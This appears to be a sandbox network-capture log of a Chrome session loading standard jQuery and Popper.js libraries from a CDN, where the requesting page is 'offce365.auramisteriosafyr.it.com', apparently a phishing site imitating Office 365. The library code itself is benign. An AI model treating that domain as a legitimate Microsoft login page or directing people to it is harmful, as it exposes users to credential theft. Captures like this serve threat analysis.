                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                                        Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                                        Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                        Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                                        Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
                                                                                        Data Ascii: ")"),CLASS:new RegExp("^\\.("+L+")"),TAG:new RegExp("^("+L+"|[*])"),ATTR:new RegExp("^"+M),PSEUDO:new RegExp("^"+N),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+K+"*(even|odd|(([+-]|)(\\d*)n|)"+K+"*(?:([+-]|)"+K+"*(\\d+)|))"+K
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 3d 3d 77 26 26 31 31 21 3d 3d 77 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 77 26 26 28 6c 3d 5a 2e 65 78 65 63 28 61 29 29 29 69 66 28 66 3d 6c 5b 31 5d 29 7b 69 66 28 39 3d 3d 3d 77 29 7b 69 66 28 21 28 6a 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 29 72 65 74 75 72 6e 20 64 3b 69 66 28 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68 28 6a 29 2c 64 7d 65 6c 73 65 20 69 66 28 73 26 26 28 6a 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 66 29 29 26 26 74 28 62 2c 6a 29 26 26 6a 2e 69 64 3d 3d 3d 66 29 72 65 74 75 72 6e 20 64 2e 70 75 73 68
                                                                                        Data Ascii: ==w&&11!==w)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==w&&(l=Z.exec(a)))if(f=l[1]){if(9===w){if(!(j=b.getElementById(f)))return d;if(j.id===f)return d.push(j),d}else if(s&&(j=s.getElementById(f))&&t(b,j)&&j.id===f)return d.push
                                                                                        2025-03-24 04:00:22 UTC680INData Raw: 20 6d 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 22 69 6e 70 75 74 22 3d 3d 3d 63 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6e 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 63 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 63 29 26 26 62 2e 74 79 70 65 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 62 3f 62 2e 70 61
                                                                                        Data Ascii: ma(a){return function(b){var c=b.nodeName.toLowerCase();return"input"===c&&b.type===a}}function na(a){return function(b){var c=b.nodeName.toLowerCase();return("input"===c||"button"===c)&&b.type===a}}function oa(a){return function(b){return"form"in b?b.pa
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 7d 2c 66 3d 67 61 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 26 26 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 21 62 26 26 22 48 54 4d 4c 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 7d 2c 6d 3d 67 61 2e 73 65 74 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 65 2c 67 3d 61 3f 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 3a 76 3b 72 65 74 75 72 6e 20 67 21 3d 3d 6e 26 26 39 3d 3d 3d 67 2e 6e 6f 64 65 54 79 70 65 26 26 67 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3f 28 6e 3d 67 2c 6f 3d 6e 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 70 3d 21 66 28 6e 29 2c 76 21 3d 3d 6e 26 26 28 65
                                                                                        Data Ascii: },f=ga.isXML=function(a){var b=a&&(a.ownerDocument||a).documentElement;return!!b&&"HTML"!==b.nodeName},m=ga.setDocument=function(a){var b,e,g=a?a.ownerDocument||a:v;return g!==n&&9===g.nodeType&&g.documentElement?(n=g,o=n.documentElement,p=!f(n),v!==n&&(e
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 65 3d 3d 3d 61 29 72 65 74 75 72 6e 5b 66 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 64 2e 66 69 6e 64 2e 54 41 47 3d 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 61 29 3a 63 2e 71 73 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 5b 5d 2c 65 3d 30 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 61 29 3b 69 66 28 22 2a 22 3d 3d 3d 61 29
                                                                                        Data Ascii: e===a)return[f]}return[]}}),d.find.TAG=c.getElementsByTagName?function(a,b){return"undefined"!=typeof b.getElementsByTagName?b.getElementsByTagName(a):c.qsa?b.querySelectorAll(a):void 0}:function(a,b){var c,d=[],e=0,f=b.getElementsByTagName(a);if("*"===a)
                                                                                        2025-03-24 04:00:22 UTC1378INData Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2a 2c 3a 78 22 29 2c 71 2e 70 75 73 68 28 22 2c 2e 2a 3a 22 29 7d 29 29 2c 28 63 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 59 2e 74 65 73 74 28 73 3d 6f 2e 6d 61 74 63 68 65 73 7c 7c 6f 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 6f 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 6f 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 6f 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 6a 61 28 66 75 6e 63 74 69 6f 6e 28 61
                                                                                        Data Ascii: uerySelectorAll(":disabled").length&&q.push(":enabled",":disabled"),a.querySelectorAll("*,:x"),q.push(",.*:")})),(c.matchesSelector=Y.test(s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelector))&&ja(function(a


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.1649741104.17.24.144436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:22 UTC724OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:22 UTC956INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:22 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"5eb03fa9-4af4"
                                                                                        Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 191221
                                                                                        Expires: Sat, 14 Mar 2026 04:00:22 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nWAWshc8TSpgPyFLCZ6VRmE8PgMQ0xKY45Yxva6ZULp8pWr1JRCm62ZVi3Z6Mhder5s4zPwtfJ7NLbRl4FHz4Ut9cibkE6mmdWJh8%2FEdXbVdcC%2FpzgluOLRibD6mm6THFMKKWWL"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342de3fad42db-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:22 UTC413INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                        Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d 65 6e 74 27 3a 72 65
                                                                                        Data Ascii: odeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':re
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62 6f 72 64 65 72 27 2b
                                                                                        Data Ascii: o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['border'+
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65 74 75 72 6e 28 69 3f
                                                                                        Data Ascii: top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}return(i?
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 77 69 64 74 68 2c
                                                                                        Data Ascii: p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e.width,
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e 73 74 61 6e 63 65 3a
                                                                                        Data Ascii: rn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={instance:
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70 61 73 73 69 76 65 3a
                                                                                        Data Ascii: ptions.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{passive:
